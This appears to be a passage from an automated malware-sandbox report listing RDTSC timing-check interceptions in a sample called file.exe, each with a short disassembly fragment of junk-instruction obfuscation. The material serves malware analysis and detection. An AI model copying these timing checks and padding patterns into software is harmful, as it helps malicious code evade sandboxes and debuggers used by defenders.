Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82DB5A second address: 82DB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007FF40C70B067h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82C574 second address: 82C580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF40CBDB926h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82C708 second address: 82C711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82C711 second address: 82C717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82C717 second address: 82C71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82D3DD second address: 82D3FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF40CBDB933h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82D3FD second address: 82D404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82D404 second address: 82D40A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82D40A second address: 82D418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FF40C70B056h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 832302 second address: 832306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 832306 second address: 83230A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F9588 second address: 7F959C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB930h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F959C second address: 7F95B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF40C70B068h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F95B9 second address: 7F9603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FF40CBDB928h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push edi 0x00000025 je 00007FF40CBDB928h 0x0000002b mov dl, 94h 0x0000002d pop edi 0x0000002e lea eax, dword ptr [ebp+1248D375h] 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jne 00007FF40CBDB92Ch 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F9603 second address: 7F9608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F9608 second address: 7D7E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FF40CBDB928h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dx, 4107h 0x00000028 call dword ptr [ebp+122D3825h] 0x0000002e jl 00007FF40CBDB95Ch 0x00000034 push eax 0x00000035 push edx 0x00000036 push edi 0x00000037 pop edi 0x00000038 jng 00007FF40CBDB926h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F9BE6 second address: 7F9BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F9CC0 second address: 7F9CF9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b jmp 00007FF40CBDB934h 0x00000010 jmp 00007FF40CBDB92Bh 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007FF40CBDB928h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F9CF9 second address: 7F9D1B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov dword ptr [ebp+122D31C3h], esi 0x0000000f mov dword ptr [ebp+124570C7h], edx 0x00000015 push C6FFC25Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F9D1B second address: 7F9D2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF40CBDB92Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F9DF4 second address: 7F9E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF40C70B06Ch 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FF40C70B056h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F9EC5 second address: 7F9ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF40CBDB926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FA540 second address: 7FA545 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8325C8 second address: 8325CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83271A second address: 832720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 832720 second address: 832751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FF40CBDB937h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF40CBDB92Bh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 832751 second address: 832756 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8329B6 second address: 8329BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8329BC second address: 8329CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF40C70B05Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8329CE second address: 8329DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF40CBDB926h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8329DA second address: 8329DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8329DE second address: 8329E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8329E2 second address: 8329F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF40C70B056h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FF40C70B056h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8329F8 second address: 8329FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 832B6F second address: 832B7D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF40C70B056h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 832B7D second address: 832B81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 832FC8 second address: 832FD6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF40C70B056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 832FD6 second address: 832FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 838DC5 second address: 838DF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B060h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF40C70B064h 0x00000011 jo 00007FF40C70B058h 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 837CB4 second address: 837CBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 837CBA second address: 837CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF40C70B056h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 837CC4 second address: 837CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 837E30 second address: 837E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8380DC second address: 8380E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 838236 second address: 838247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF40C70B056h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8387E9 second address: 8387ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8387ED second address: 8387F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8387F1 second address: 8387FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8387FE second address: 838804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 838804 second address: 838812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jne 00007FF40CBDB926h 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83C2BA second address: 83C2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83F04F second address: 83F056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 842417 second address: 842421 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF40C70B05Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 842150 second address: 842155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 842155 second address: 84215B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84215B second address: 842165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF40CBDB926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84929C second address: 8492CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF40C70B069h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF40C70B05Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FF40C70B056h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 849428 second address: 849436 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 849888 second address: 84988C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84988C second address: 8498B3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF40CBDB926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF40CBDB939h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8498B3 second address: 8498BD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8498BD second address: 8498C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FA25B second address: 7FA25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FA338 second address: 7FA33E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FA33E second address: 7FA343 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84DE4B second address: 84DE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84E147 second address: 84E154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FF40C70B056h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84E154 second address: 84E18B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF40CBDB938h 0x0000000c jmp 00007FF40CBDB934h 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84E2DE second address: 84E2EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF40C70B05Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84E2EC second address: 84E303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB933h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84E303 second address: 84E31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF40C70B060h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84E598 second address: 84E59C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84E59C second address: 84E5A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84E5A0 second address: 84E5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF40CBDB926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84E6EC second address: 84E70E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF40C70B056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF40C70B068h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84E70E second address: 84E715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84E715 second address: 84E726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 853D5C second address: 853D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 853D60 second address: 853D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 853D6C second address: 853D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85351F second address: 85352E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FF40C70B056h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8536B6 second address: 8536BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8536BA second address: 8536BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 859B9F second address: 859BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF40CBDB936h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 859E28 second address: 859E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FF40C70B056h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A183 second address: 85A196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF40CBDB92Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A196 second address: 85A1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF40C70B061h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A1B0 second address: 85A1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A1B4 second address: 85A1BE instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF40C70B056h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A1BE second address: 85A1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A1CC second address: 85A1D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A1D2 second address: 85A1ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FF40CBDB926h 0x0000000d jmp 00007FF40CBDB92Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A1ED second address: 85A1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A1F4 second address: 85A1FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FF40CBDB926h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A1FF second address: 85A219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF40C70B056h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FF40C70B05Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A4F6 second address: 85A4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A4FA second address: 85A50E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF40C70B056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e js 00007FF40C70B056h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A50E second address: 85A512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A512 second address: 85A525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FF40C70B058h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A525 second address: 85A52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A52B second address: 85A52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A52F second address: 85A533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
